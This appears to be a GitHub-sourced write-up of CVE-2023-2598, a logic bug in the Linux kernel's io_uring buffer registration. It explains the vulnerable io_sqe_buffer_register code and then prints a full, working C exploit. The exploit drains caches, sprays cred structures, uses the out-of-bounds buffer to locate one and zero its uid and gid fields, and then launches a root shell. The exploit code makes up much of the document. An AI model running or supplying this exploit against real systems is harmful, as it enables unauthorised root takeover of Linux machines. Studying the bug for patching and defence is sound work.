Linux io_uring Privilege Escalation Vulnerability

Vulnerability Information

Vulnerability Name: Linux io_uring Privilege Escalation Vulnerability

Vulnerability ID:

  • CVE: CVE-2023-2598

Vulnerability Type: Privilege Escalation

Severity: High

Vulnerability Description: io_uring is a system call interface in the Linux kernel. It now supports almost all system calls, not just the read() and write() it started with, and it allows applications to initiate system calls asynchronously. The vulnerability lies in the io_sqe_buffer_register function, which maps the virtual pages of a user buffer to physical addresses. The root cause is a logic error: when checking whether pages come from the same folio, the code does not verify that they are consecutive. The same page can therefore be mapped multiple times while still passing the check. An attacker can exploit this to escalate privileges and obtain root; exploitation can lead to arbitrary code execution and data disclosure and requires no special privileges. Because io_uring is part of the Linux kernel and is widely used across Linux distributions, the vulnerability has a broad impact.

Vendor: Linux

Product: io_uring

Source: https://github.com/SpongeBob-369/CVE-2023-2598

Type: CVE-2023: GitHub search

Repository Files

  • .vscode
  • README.md
  • bzImage
  • images
  • my_exp
  • my_exploit.c
  • rootfs
  • rootfs_new.cpio
  • run.sh

Source Overview

CVE-2023-2598

What is io_uring?

io_uring is a system call interface for Linux. By now it supports almost all system calls, not just the read() and write() it started with. It enables an application to initiate system calls that can be performed asynchronously.

Submission and Completion Queues

At the core of every io_uring implementation sit two ring buffers: the submission queue (SQ) and the completion queue (CQ). These ring buffers are shared between the application and the kernel.

We can get a submission queue entry (SQE), which describes a syscall we want io_uring to perform, via io_uring_get_sqe. The application then performs an io_uring_enter syscall to tell the kernel that there is work waiting in the submission queue.

After the kernel performs the operation, it puts a completion queue entry (CQE) into the completion queue ring buffer, which can then be consumed by the application.
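As a minimal sketch of this round trip (assuming liburing is installed and /etc/hostname is readable; error handling is elided), the following program submits one read request and reaps its completion:

#include <liburing.h>
#include <fcntl.h>
#include <stdio.h>

int main(void) {
    struct io_uring ring;
    struct io_uring_sqe *sqe;
    struct io_uring_cqe *cqe;
    char buf[64];

    io_uring_queue_init(8, &ring, 0);            /* sets up the SQ and CQ rings */
    int fd = open("/etc/hostname", O_RDONLY);    /* any readable file works */

    sqe = io_uring_get_sqe(&ring);               /* grab a free SQE */
    io_uring_prep_read(sqe, fd, buf, sizeof(buf), 0);
    io_uring_submit(&ring);                      /* io_uring_enter under the hood */

    io_uring_wait_cqe(&ring, &cqe);              /* block until the CQE arrives */
    printf("read returned %d\n", cqe->res);
    io_uring_cqe_seen(&ring, cqe);               /* mark the CQE as consumed */

    io_uring_queue_exit(&ring);
    return 0;
}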

Vulnerability

The function io_sqe_buffer_register implements the mapping between virtual pages and physical addresses.

We should clarify some concepts first.

The application initiates a buffer-registration request via io_uring_register. The call chain is as follows:

io_uring_register_buffers->io_uring_register->io_sqe_buffers_register

The source code of the function io_sqe_buffers_register is as follows:

int io_sqe_buffers_register(struct io_ring_ctx *ctx, void __user *arg,
                            unsigned int nr_args, u64 __user *tags)
{
    struct page *last_hpage = NULL;
    struct io_rsrc_data *data;
    int i, ret;
    struct iovec iov;

    BUILD_BUG_ON(IORING_MAX_REG_BUFFERS >= (1u << 16));

    if (ctx->user_bufs)
        return -EBUSY;
    if (!nr_args || nr_args > IORING_MAX_REG_BUFFERS)
        return -EINVAL;
    ret = io_rsrc_node_switch_start(ctx);
    if (ret)
        return ret;
    ret = io_rsrc_data_alloc(ctx, io_rsrc_buf_put, tags, nr_args, &data);
    if (ret)
        return ret;
    ret = io_buffers_map_alloc(ctx, nr_args);
    if (ret) {
        io_rsrc_data_free(data);
        return ret;
    }

    for (i = 0; i < nr_args; i++, ctx->nr_user_bufs++) {
        if (arg) {
            ret = io_copy_iov(ctx, &iov, arg, i);
            if (ret)
                break;
            ret = io_buffer_validate(&iov);
            if (ret)
                break;
        } else {
            memset(&iov, 0, sizeof(iov));
        }

        if (!iov.iov_base && *io_get_tag_slot(data, i)) {
            ret = -EINVAL;
            break;
        }

        ret = io_sqe_buffer_register(ctx, &iov, &ctx->user_bufs[i],
                                     &last_hpage);
        if (ret)
            break;
    }

    WARN_ON_ONCE(ctx->buf_data);

    ctx->buf_data = data;
    if (ret)
        __io_sqe_buffers_unregister(ctx);
    else
        io_rsrc_node_switch(ctx, NULL);
    return ret;
}

Inside this function we run into io_sqe_buffer_register, and this is where we find the logic bug. The source code of the function io_sqe_buffer_register is as follows:

static int io_sqe_buffer_register(struct io_ring_ctx *ctx, struct iovec *iov,
                                  struct io_mapped_ubuf **pimu,
                                  struct page **last_hpage)
{
    struct io_mapped_ubuf *imu = NULL;
    struct page **pages = NULL;
    unsigned long off;
    size_t size;
    int ret, nr_pages, i;
    struct folio *folio = NULL;

    *pimu = ctx->dummy_ubuf;
    if (!iov->iov_base)
        return 0;

    ret = -ENOMEM;
    pages = io_pin_pages((unsigned long) iov->iov_base, iov->iov_len,
                         &nr_pages);
    if (IS_ERR(pages)) {
        ret = PTR_ERR(pages);
        pages = NULL;
        goto done;
    }

    /* If it's a huge page, try to coalesce them into a single bvec entry */
    if (nr_pages > 1) {
        folio = page_folio(pages[0]);
        for (i = 1; i < nr_pages; i++) {
            if (page_folio(pages[i]) != folio) {
                folio = NULL;
                break;
            }
        }
        if (folio) {
            folio_put_refs(folio, nr_pages - 1);
            nr_pages = 1;
        }
    }

    imu = kvmalloc(struct_size(imu, bvec, nr_pages), GFP_KERNEL);
    if (!imu)
        goto done;

    ret = io_buffer_account_pin(ctx, pages, nr_pages, imu, last_hpage);
    if (ret) {
        unpin_user_pages(pages, nr_pages);
        goto done;
    }

    off = (unsigned long) iov->iov_base & ~PAGE_MASK;
    size = iov->iov_len;
    /* store original address for later verification */
    imu->ubuf = (unsigned long) iov->iov_base;
    imu->ubuf_end = imu->ubuf + iov->iov_len;
    imu->nr_bvecs = nr_pages;
    *pimu = imu;
    ret = 0;

    if (folio) {
        bvec_set_page(&imu->bvec[0], pages[0], size, off);
        goto done;
    }
    for (i = 0; i < nr_pages; i++) {
        size_t vec_len;

        vec_len = min_t(size_t, size, PAGE_SIZE - off);
        bvec_set_page(&imu->bvec[i], pages[i], vec_len, off);
        off = 0;
        size -= vec_len;
    }
done:
    if (ret)
        kvfree(imu);
    kvfree(pages);
    return ret;
}

Here I will only mention a few important points:

  1. imu means virtual address/page.
  2. page means physical address/page.
  3. A folio is a set of physically contiguous pages. It removes the ambiguity that arises when a function is passed a page belonging to a contiguous range: with a folio it is explicit whether the whole range or just the single page is meant.
  4. struct iovec is just a structure that describes a buffer: the start address of the buffer and its length. Nothing more.
  5. An io_mapped_ubuf is a structure that holds the information about a buffer that has been registered to an io_uring instance:
struct io_mapped_ubuf {
    u64 ubuf;                  // the address at which the buffer starts
    u64 ubuf_end;              // the address at which it ends
    unsigned int nr_bvecs;     // how many bio_vec(s) are needed to address the buffer
    unsigned long acct_pages;
    struct bio_vec bvec[];     // array of bio_vec(s)
};

The member bvec is an array of struct bio_vec, a structure like iovec but for physical memory.
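For reference, struct bio_vec is essentially a (page, length, offset) triple describing a contiguous span of physical memory:

struct bio_vec {
    struct page  *bv_page;    /* first page of the span */
    unsigned int bv_len;      /* length of the span in bytes */
    unsigned int bv_offset;   /* offset into the first page */
};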

...
/* If it's a huge page, try to coalesce them into a single bvec entry */
if (nr_pages > 1) {                     // if more than one page
    folio = page_folio(pages[0]);       // converts from page to folio:
                                        // returns the folio that contains this page
    for (i = 1; i < nr_pages; i++) {
        if (page_folio(pages[i]) != folio) { // different folios -> not physically contiguous
            folio = NULL;                    // set folio to NULL as we cannot coalesce into a single entry
            break;
        }
    }
    if (folio) {                        // if all the pages are in the same folio
        folio_put_refs(folio, nr_pages - 1);
        nr_pages = 1;                   // sets nr_pages to 1 as it can be represented as a single folio page
    }
}
...

The code that checks whether the pages come from the same folio doesn't actually check whether they are consecutive. They could be the same page mapped multiple times: during the iteration, page_folio(page) would return the same folio again and again, passing the check. This is an obvious logic bug.
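Note that no huge page is needed to reach this path: aliasing one memfd-backed page at many consecutive virtual addresses makes io_pin_pages() pin the same struct page repeatedly, so every entry resolves to the same folio. A minimal trigger sketch (the values mirror the exploit shown later; error handling omitted):

/* Alias one physical page nr_pages times so the folio check passes. */
int memfd = memfd_create("io_register_buf", 0);
fallocate(memfd, 0, 0, PAGE_SIZE);                 /* one backing page */

uint64_t start_addr = 0x800000000UL;
int nr_pages = 500;
for (int i = 0; i < nr_pages; i++)                 /* same page, 500 mappings */
    mmap((void *)(start_addr + i * PAGE_SIZE), PAGE_SIZE,
         PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED, memfd, 0);

struct iovec iov = {
    .iov_base = (void *)start_addr,
    .iov_len  = nr_pages * PAGE_SIZE,              /* 500 pages claimed, 1 page backing */
};
io_uring_register_buffers(&ring, &iov, 1);         /* coalesced into a single bvec */

Let's continue with io_sqe_buffer_register and see what the fallout is.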

...
imu = kvmalloc(struct_size(imu, bvec, nr_pages), GFP_KERNEL);
// allocates imu with an array for nr_pages bio_vec(s)
// bio_vec - a contiguous range of physical memory addresses
// we need a bio_vec for each (physical) page
// in the case of a folio, the array of bio_vec(s) will be of size 1
if (!imu)
    goto done;

ret = io_buffer_account_pin(ctx, pages, nr_pages, imu, last_hpage);
if (ret) {
    unpin_user_pages(pages, nr_pages);
    goto done;
}

off = (unsigned long) iov->iov_base & ~PAGE_MASK;
size = iov->iov_len;                         // sets the size to that passed by the user!
/* store original address for later verification */
imu->ubuf = (unsigned long) iov->iov_base;   // user-controlled
imu->ubuf_end = imu->ubuf + iov->iov_len;    // calculates the end based on the length
imu->nr_bvecs = nr_pages;                    // this would be 1 in the case of a folio
*pimu = imu;
ret = 0;

if (folio) { // in the case of a folio we need just a single bio_vec (efficient!)
    bvec_set_page(&imu->bvec[0], pages[0], size, off);
    goto done;
}
for (i = 0; i < nr_pages; i++) {
    size_t vec_len;

    vec_len = min_t(size_t, size, PAGE_SIZE - off);
    bvec_set_page(&imu->bvec[i], pages[i], vec_len, off);
    off = 0;
    size -= vec_len;
}
done:
    if (ret)
        kvfree(imu);
    kvfree(pages);
    return ret;
}

A single bio_vec is allocated, since nr_pages has been set to 1. The buffer size recorded in imu->ubuf_end and imu->bvec[0].bv_len is the one passed by the user in iov->iov_len.
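With the aliased mapping sketched above, that single bio_vec spans iov->iov_len = 500 * 0x1000 = 0x1F4000 bytes but is backed by a single 0x1000-byte page. Fixed reads and writes through the registered buffer therefore reach the 499 physically contiguous pages that follow the pinned page, roughly 2 MiB of out-of-bounds physical memory access. (For reference, the upstream fix adds a consecutiveness check, pages[i] == pages[i - 1] + 1, to the folio loop before coalescing.)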

Exploitation

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <stdint.h>
#include <liburing.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <mqueue.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <sched.h>

#define CRED_DRAIN 100    // processes forked to drain the cred cache
#define CRED_SPRAY 2000   // number of clones to spray
#define PAGE_SIZE  0x1000 // size of a memory page
#define MAX_PAGES  100    // maximum number of pages to allocate

struct timespec timer = {
    .tv_sec = 1145141919,
    .tv_nsec = 0,
};

#define COLOR_RED "\033[1;31m"
#define COLOR_GREEN "\033[1;32m"
#define COLOR_RESET "\033[0m"
int check_root_pipe[2];
char bin_sh_str[] = "/bin/sh";
char child_pipe_buf[1];
// char root_str[] = "Finally get root privilege!\n";
char root_str[] = "\033[32m\033[1m[+] Successful to get the root.\n"
                  "\033[34m[*] Execve root shell now...\033[0m\n";

char *shell_args[] = { bin_sh_str, NULL };

void err_exit(char *buf){
    fprintf(stderr, "%s[-]%s : %s%s\n", COLOR_RED, buf, strerror(errno), COLOR_RESET);
    exit(-1);
}

void check_ret(int ret, char *buf){
    if(ret < 0){
        err_exit(buf);
    }
}

void log_msg(char *buf){
    fprintf(stdout, "[+] %s\n", buf);
}
void log_fail_msg(char *buf){
    fprintf(stdout, "[-] %s\n", buf);
}

// Clear the system's cred cache so that when we fork a subprocess,
// its credentials are allocated from fresh buddy memory.
void clear_cred_cache(){
    for(int i = 0; i < CRED_DRAIN; i++){
        int ret = fork();
        if(!ret){
            read(check_root_pipe[0], child_pipe_buf, 1);
            if(getuid() == 0){
                write(1, root_str, 80);
                system("/bin/sh");
            }
            sleep(100000000);
        }
        check_ret(ret, "fork fail");
    }
}

// Clear buddy memory of order 0, 1, 2... and so on.
void clear_buddy(){
    log_msg("Buddy system cache cleared");
    void *page[MAX_PAGES];
    for(int i = 0; i < MAX_PAGES; i++){
        page[i] = mmap((void *)(0x60000000UL + i * 0x200000UL), PAGE_SIZE,
                       PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    }
    for(int i = 0; i < MAX_PAGES; i++){
        *(char *)page[i] = 'a';
    }
}

// Intel-syntax inline assembly: build with -masm=intel.
__attribute__ ((naked)) long simple_clone(int flags, int (*fn)(void *)){
    __asm__ volatile (
        " mov r15, rsi\n"
        " xor rsi, rsi\n"
        " xor rdx, rdx\n"
        " xor r10, r10\n"
        " xor r8, r8\n"
        " xor r9, r9\n"
        " mov rax, 56\n"
        " syscall\n"       // clone()
        " cmp rax, 0\n"
        " je child_fn\n"
        " ret\n"           // parent
        "child_fn:\n"
        " jmp r15\n"       // child
    );
}

int wait_for_root_fn(void *args){
    // Wait for root privilege
    __asm__ volatile (
        // read(check_root_pipe[0], child_pipe_buf, 1);
        " lea rax, [check_root_pipe]\n"
        " xor rdi, rdi\n"
        " mov edi, dword ptr [rax]\n"
        " mov rsi, child_pipe_buf\n"
        " mov rdx, 1\n"
        " xor rax, rax\n"  // read(check_root_pipe[0], child_pipe_buf, 1)
        " syscall\n"
        " mov rax, 102\n"  // getuid()
        " syscall\n"
        " cmp rax, 0\n"
        " jne failed\n"
        " mov rdi, 1\n"
        " lea rdi, [bin_sh_str]\n"
        " lea rsi, [shell_args]\n"
        " xor rdx, rdx\n"
        " mov rax, 59\n"   // execve("/bin/sh", args, NULL)
        " syscall\n"
        "failed: \n"
        " lea rdi, [timer]\n"
        " xor rsi, rsi\n"
        " mov rax, 35\n"
        " syscall\n"       // nanosleep(&timer, NULL)
    );
    return 0;
}

int main(){
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(sched_getcpu(), &set);
    if (sched_setaffinity(0, sizeof(set), &set) < 0) {
        perror("sched_setaffinity");
        exit(EXIT_FAILURE);
    }
    // io_uring setup
    struct io_uring ring;
    struct io_uring_sqe *sqe;
    struct io_uring_cqe *cqe;
    struct iovec iovec;
    // buffers for read/write operations
    int memfd;
    int rw_fd;
    int page_offset = -1;
    uint64_t start_addr = 0x800000000;
    int nr_pages = 500;
    char *rw_buffer;
    char buf[CRED_SPRAY + CRED_DRAIN];
    log_msg("Clearing cred cache");
    pipe(check_root_pipe);
    clear_cred_cache();
    log_msg("Clearing buddy system cache");
    clear_buddy();
    log_msg("Setting up io_uring");
    check_ret(io_uring_queue_init(8, &ring, 0), "io_uring_setup failed");
    log_msg("Preparing buffer for registration");

    // Create memfds for the registered buffer and the read/write scratch file
    memfd = memfd_create("io_register_buf", MFD_CLOEXEC);
    check_ret(memfd, "memfd_create failed");
    rw_fd = memfd_create("read_write_file", MFD_CLOEXEC);
    check_ret(rw_fd, "memfd_create failed");

    check_ret(fallocate(memfd, 0, 0, 1 * PAGE_SIZE), "memfd fallocate failed");
    check_ret(fallocate(rw_fd, 0, 0, 1 * PAGE_SIZE), "rw_fd fallocate failed");

    // Map the single memfd page at nr_pages consecutive virtual addresses
    for(int i = 0; i < nr_pages; i++){
        if (mmap((void *)(start_addr + i * PAGE_SIZE), PAGE_SIZE,
                 PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd, 0) == MAP_FAILED)
            err_exit("mmap failed");
    }
    // Register the aliased buffer with io_uring
    log_msg("Registering buffer for io_uring");
    iovec.iov_base = (void *)start_addr;
    iovec.iov_len = nr_pages * PAGE_SIZE;
    rw_buffer = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, rw_fd, 0);
    if (rw_buffer == MAP_FAILED) {
        perror("mmap rw_fd");
        exit(EXIT_FAILURE);
    }
    check_ret(io_uring_register_buffers(&ring, &iovec, 1), "io_uring_register_buffers failed");
    // Spray creds
    log_msg("Spraying credentials");
    for(int i = 0; i < CRED_SPRAY; i++){
        // check_ret(simple_clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_THREAD | CLONE_SIGHAND, wait_for_root_fn), "clone failed");
        check_ret(simple_clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND, wait_for_root_fn), "clone failed");
    }

    log_msg("Searching for cred that we sprayed");
    // Leak each page of the OOB window and look for a sprayed cred
    for(int i = 0; i < nr_pages; i++){
        sqe = io_uring_get_sqe(&ring);
        if (sqe == NULL) {
            err_exit("io_uring_get_sqe failed");
        }
        io_uring_prep_write_fixed(sqe, rw_fd, (void *)(start_addr + i * PAGE_SIZE),
                                  PAGE_SIZE, 0, 0);
        check_ret(io_uring_submit(&ring), "io_uring_submit failed");
        io_uring_wait_cqe(&ring, &cqe);
        io_uring_cqe_seen(&ring, cqe);
        int uid = ((int *)(rw_buffer))[1];
        int gid = ((int *)(rw_buffer))[2];
        if(uid == 1000 && gid == 1000){  // assumes the unprivileged user is uid/gid 1000
            log_msg("Found the target cred page");
            page_offset = i;
            break;
        }
    }
    if(page_offset < 0){
        log_fail_msg("Could not find cred page");
        exit(-1);
    }
    log_msg("Editing cred's uid to 0");
    uint32_t *cred = (uint32_t *)rw_buffer;
    // cred[0] = 0x2;  // Keep usage unchanged
    cred[1] = 0x0;     // uid
    cred[2] = 0x0;     // gid
    cred[3] = 0x0;     // suid
    cred[4] = 0x0;     // sgid
    cred[5] = 0x0;     // euid
    cred[6] = 0x0;     // egid

    sqe = io_uring_get_sqe(&ring);
    if(sqe == NULL) {
        err_exit("io_uring_get_sqe failed");
    }
    io_uring_prep_read_fixed(sqe, rw_fd, (void *)(start_addr + page_offset * PAGE_SIZE),
                             28, 0, 0);
    check_ret(io_uring_submit(&ring), "io_uring_submit failed");
    io_uring_wait_cqe(&ring, &cqe);
    io_uring_cqe_seen(&ring, cqe);

    log_msg("check privilege in child processes");
    write(check_root_pipe[1], buf, CRED_SPRAY + CRED_DRAIN);
    sleep(100000000);
    return 0;
}

The main idea of the exploit above is to drain the cred cache and occupy as much buddy memory as possible first, so that when we spray processes (and thus struct cred allocations), a target cred lands within the 500 physically consecutive pages reachable through the over-sized registered buffer. We can then locate a sprayed cred within those 500 pages, overwrite its uid/gid fields with 0, and spawn a root shell.

